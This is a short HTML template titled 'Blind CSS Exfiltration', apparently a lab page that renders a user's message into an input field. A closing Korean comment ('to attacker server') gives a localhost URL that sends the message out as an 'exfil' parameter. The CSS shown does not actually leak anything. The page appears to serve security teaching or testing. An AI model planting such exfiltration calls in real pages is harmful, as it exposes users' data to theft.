<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Blind CSS Exfiltration</title>
  <style>
    body {
      background-color: black;
      color: white;
    }
    input[type="text"] {
      background-image: url("https://img.freepik.com/free-photo/red-paper-background-elegant-scarlet-background-for-holiday-decoration-or-web-design-paper-texture_166373-2152.jpg?size=626&ext=jpg&ga=GA1.1.1788614524.1717718400&semt=ais_user");
    }
  </style>
</head>
<body>
  <h1>Blind CSS Exfiltration</h1>
  <p>Your message has been received:</p>
  <input type="text" id="userMessage" value="<%= message %>" readonly>
</body>
</html>

<!--공격자 서버로: http://localhost:4000/?exfil=<%= message %> -->